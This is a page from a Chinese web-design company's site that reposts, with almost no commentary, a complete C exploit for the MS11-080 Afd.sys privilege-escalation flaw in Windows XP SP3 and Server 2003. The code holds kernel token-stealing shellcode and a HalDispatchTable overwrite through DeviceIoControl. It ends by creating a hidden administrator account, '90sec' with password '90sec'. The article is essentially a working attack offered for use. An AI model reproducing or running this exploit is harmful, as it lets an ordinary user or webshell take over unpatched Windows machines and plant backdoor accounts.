网站首页
关于我们
关于我们
技术团队
加入威势
联系我们
品牌视界
品牌理念
品牌价值
网站建设
建站指南
域名注册
域名知识
在线教程
解决方案
政府机关网站
中小企业网站
集团公司网站
旅游宾馆网站
餐饮娱乐网站
企业营销网站
行业管理软件
SEO服务
Google优化
百度优化
SEO技术
精彩案例
网站开发
NET编程
AJAX技术
数据库
XML/CSS/JS
ASP/PHP
网站安全
联系我们
联系方式
乘车线路
在线问答
联系威势网络科技有限公司
MS11080漏洞利用
文章作者:
来源于互联网
发布时间:2012/2/18 21:05:00 浏览次数:9014 次
MS11-080
/*
* MS11-080 Afd.sys Privilege Escalation Exploit
* 来源:Matteo Memelli,
http://www.exploit-db.com/exploits/18176/
* 改编:KiDebug,
Google@pku.edu.cn
* 编译:VC6.0
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell
*/
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
#pragma comment (lib, "ws2_32.lib")
USER_INFO_1 ui;
DWORD dwError = 0;
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
add edi, eax
movsd
popfd
popad
ret
}
}
void adduser()
{
ui.usri1_name =L"90sec";
ui.usri1_password =L"90sec";
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError)==NERR_Success)
{
printf("[*] User has been successfully added\n");
wchar_t szAccountName[100]={0};
wcscpy(szAccountName,ui.usri1_name);
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
if (NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1)==NERR_Success)
{
printf("[*] Add to Administrators success\n");
return ;
}
}
}
void main( )
{
//USER_INFO_1 ui;
//DWORD dwError = 0;
HMODULE ntdll = GetModuleHandle( "ntdll.dll" );
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return;
ULONG BaseAddress = 1 , RegionSize = 0x1000, status;
status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( status )
return;
//取ntoskrnl的信息,只要调用一次就行
ULONG NtoskrnlBase;
RTL_PROCESS_MODULES module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH
return;
NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;
//把ntoskrnl.exe加载进来
HMODULE ntoskrnl;
ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return;
//计算实际地址
WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址
PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
//以下代码就各显神通了
if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
return;
memset((PVOID)0x02070000,0x90,0x20000);
memcpy((PVOID)0x02080000,ShellCode,100);
WSADATA ws;
SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG dwReturnSize;
WSAStartup(0x0202,&ws);
peer.sin_family = AF_INET;
peer.sin_port = htons(4455);
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf("[>] ms11-08 Exploit\n");
printf("[>] by:Mer4en7y@90sec.org\n");
}
UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
memset((PVOID)0x1000,0x45,0x108);
memcpy((PVOID)0x1000,buf1,25);
if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
{
printf("[*] Token system command\n");
printf("[*] command add user 90sec 90sec\n");
}
NtQueryIntervalProfile( 2, &status );
adduser();
return;
}
|
网站首页
|
SEO优化
|
Baidu推广
|
问题咨询
|
联系我们
|
友情链接:
网站解决方案
|
网站推广
公司地址:青海省西宁市城西区南川西路23号
青ICP备13000578号
(历史备案号:青ICP备08100091号) 公安机关备案号:63010402000123
QQ:147399120
QQ:147399120
QQ:147399120
E-Mail:lostlove000@163.com 电话:138-9741-0341
© Copyright( 2008-2012)
Web.QhWins.Com
All Rights Reserved 西宁威势电子信息服务有限公司(威势网络)版权所有,未经书面制授权,请勿随意转载!